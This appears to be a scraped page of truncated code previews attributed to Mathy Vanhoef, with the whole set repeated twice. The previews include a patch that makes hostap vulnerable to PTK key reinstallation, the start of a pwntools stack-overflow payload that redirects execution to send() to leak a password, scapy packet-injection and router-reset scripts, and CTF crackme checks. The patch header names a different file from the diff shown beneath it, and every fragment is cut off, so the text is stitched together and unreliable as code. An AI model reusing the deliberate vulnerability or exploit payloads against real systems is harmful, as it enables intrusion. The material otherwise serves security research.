February 17, 2023 20:41 · June 24, 2020 00:13 · June 24, 2020 00:10 · June 21, 2020 01:25 · June 21, 2020 01:18 · February 5, 2016 23:30
 From b2393237de31be1799cb9026e30a5bf7b611f6e7 Mon Sep 17 00:00:00 2001
 From: Mathy Vanhoef <[email protected]>
 Date: Fri, 17 Feb 2023 21:38:06 +0100
 Subject: [PATCH] Make hostap vulnerable to PTK key reinstallation

 Apply this patch to hostap_2_10 to make it vulnerable to PTK key
 reinstallations.
 ---
 src/rsn_supp/wpa.c | 23 +++++++++++++++++++++++
 1 file changed, 23 insertions(+)
 diff --git a/drivers/net/wireless/ath/ath9k/htc_drv_main.c b/drivers/net/wireless/ath/ath9k/htc_drv_main.c
 index d441045..84359c3 100644
 --- a/drivers/net/wireless/ath/ath9k/htc_drv_main.c
 +++ b/drivers/net/wireless/ath/ath9k/htc_drv_main.c
 @@ -147,21 +147,26 @@ static void ath9k_htc_bssid_iter(void *data, u8 *mac, struct ieee80211_vif *vif)
 	struct ath9k_vif_iter_data *iter_data = data;
 	int i;
 
 -	for (i = 0; i < ETH_ALEN; i++)
 -		iter_data->mask[i] &= ~(iter_data->hw_macaddr[i] ^ mac[i]);
 #!/usr/bin/python
 from scapy.all import *
 import random

 # number of times to inject probe for one bit (combat packet loss)
 ATTEMPTS_PER_BIT = 3
 # time to wait for ACK in seconds
 SNIFFTIME = 0.1

 #!/usr/bin/env python3
 from selenium.webdriver import Firefox
 from selenium.webdriver.firefox.options import Options
 import subprocess, time

 def reset_router(browser):
 	browser.execute_script('javascript:CheckHTMLStatus("System");')
 	time.sleep(0.13)
 	browser.execute_script('javascript:SetFactory_Default();')
 	time.sleep(0.01)
 #!/usr/bin/env python3
 from scapy.all import *

 # MAC address of our own interface
 MYMACADDR = "11:22:33:44:55:66"

 def wait_router(iface, ip):
 	s = L2Socket(type=ETH_P_ALL, iface=iface)
 	arp = Ether(dst="ff:ff:ff:ff:ff:ff", src=MYMACADDR)
 	arp = arp/ARP(hwsrc=MYMACADDR, pdst=ip, psrc="192.168.0.100")
 /** Comp128 version 2 and 3 overview by Mathy Vanhoef (based on other contributions mentioned inline) */
 #include <string.h>
 #include <stdio.h>
 #include <stdint.h>
 #include <stdlib.h>
 #include <time.h>


 static uint8_t table0[] = {
 	197, 235,  60, 151,  98,  96,   3, 100, 248, 118,  42, 117, 172, 211, 181, 203,
 #!/usr/bin/env python2
 from pwn import *


 # Stack layout of vulnerable functions:
 #
 #	[   buffer of some length  ][canary][align1][align2][saved-ebp][return-addr][arg0-buffer][arg4-count]
 #

 payload  = pack(0x08048740)			# send function -> send(socket, &password, 0x100, 0)
 #include <stdio.h>
 #include <stdint.h>

 int is_correct(uint32_t seed) {
 	uint8_t hexkey[] = "\xA4\x3D\xF6\xF3\x74";
 	for (uint32_t i = 0, x = seed; i < 5; ++i) {
 		x = (214013 * x + 2531011) & 0xFFFFFF;
 		if (hexkey[i] != (x >> 16)) return 0;
 	}
 	return 1;
 #include <stdio.h>
 #include <stdint.h>

 int is_correct(uint32_t seed) {
 	uint8_t hexkey[] = "\xA4\x3D\xF6\xF3\x74";
 	for (uint32_t i = 0, x = seed; i < 5; ++i) {
 		x = (214013 * x + 2531011) & 0xFFFFFF;
 		printf("%X\n", x);
 		if (hexkey[i] != (x >> 16)) return 0;
 	}
 function validate() {
 	var x = document.forms["formxx"]["pwz"].value;
 	if (!x.match(/^[A-Za-z]+$/))
 		return false;

 	if (!sha1(x).match(/^ff7b948953ac/))
 		return false;

 	alert("Flag: " + x);
 	return true;
	From b2393237de31be1799cb9026e30a5bf7b611f6e7 Mon Sep 17 00:00:00 2001
	From: Mathy Vanhoef <[email protected]>
	Date: Fri, 17 Feb 2023 21:38:06 +0100
	Subject: [PATCH] Make hostap vulnerable to PTK key reinstallation

	Apply this patch to hostap_2_10 to make it vulnerable to PTK key
	reinstallations.
	---
	src/rsn_supp/wpa.c \| 23 +++++++++++++++++++++++
	1 file changed, 23 insertions(+)
	diff --git a/drivers/net/wireless/ath/ath9k/htc_drv_main.c b/drivers/net/wireless/ath/ath9k/htc_drv_main.c
	index d441045..84359c3 100644
	--- a/drivers/net/wireless/ath/ath9k/htc_drv_main.c
	+++ b/drivers/net/wireless/ath/ath9k/htc_drv_main.c
	@@ -147,21 +147,26 @@ static void ath9k_htc_bssid_iter(void data, u8 mac, struct ieee80211_vif *vif)
	struct ath9k_vif_iter_data *iter_data = data;
	int i;

	- for (i = 0; i < ETH_ALEN; i++)
	- iter_data->mask[i] &= ~(iter_data->hw_macaddr[i] ^ mac[i]);
	#!/usr/bin/python
	from scapy.all import *
	import random

	# number of times to inject probe for one bit (combat packet loss)
	ATTEMPTS_PER_BIT = 3
	# time to wait for ACK in seconds
	SNIFFTIME = 0.1
	#!/usr/bin/env python3
	from selenium.webdriver import Firefox
	from selenium.webdriver.firefox.options import Options
	import subprocess, time

	def reset_router(browser):
	browser.execute_script('javascript:CheckHTMLStatus("System");')
	time.sleep(0.13)
	browser.execute_script('javascript:SetFactory_Default();')
	time.sleep(0.01)
	#!/usr/bin/env python3
	from scapy.all import *

	# MAC address of our own interface
	MYMACADDR = "11:22:33:44:55:66"

	def wait_router(iface, ip):
	s = L2Socket(type=ETH_P_ALL, iface=iface)
	arp = Ether(dst="ff:ff:ff:ff:ff:ff", src=MYMACADDR)
	arp = arp/ARP(hwsrc=MYMACADDR, pdst=ip, psrc="192.168.0.100")
	/** Comp128 version 2 and 3 overview by Mathy Vanhoef (based on other contributions mentioned inline) */
	#include <string.h>
	#include <stdio.h>
	#include <stdint.h>
	#include <stdlib.h>
	#include <time.h>


	static uint8_t table0[] = {
	197, 235, 60, 151, 98, 96, 3, 100, 248, 118, 42, 117, 172, 211, 181, 203,
	#!/usr/bin/env python2
	from pwn import *


	# Stack layout of vulnerable functions:
	#
	# [ buffer of some length ][canary][align1][align2][saved-ebp][return-addr][arg0-buffer][arg4-count]
	#

	payload = pack(0x08048740) # send function -> send(socket, &password, 0x100, 0)
	#include <stdio.h>
	#include <stdint.h>

	int is_correct(uint32_t seed) {
	uint8_t hexkey[] = "\xA4\x3D\xF6\xF3\x74";
	for (uint32_t i = 0, x = seed; i < 5; ++i) {
	x = (214013 * x + 2531011) & 0xFFFFFF;
	if (hexkey[i] != (x >> 16)) return 0;
	}
	return 1;
	function validate() {
	var x = document.forms["formxx"]["pwz"].value;
	if (!x.match(/^[A-Za-z]+$/))
	return false;

	if (!sha1(x).match(/^ff7b948953ac/))
	return false;

	alert("Flag: " + x);
	return true;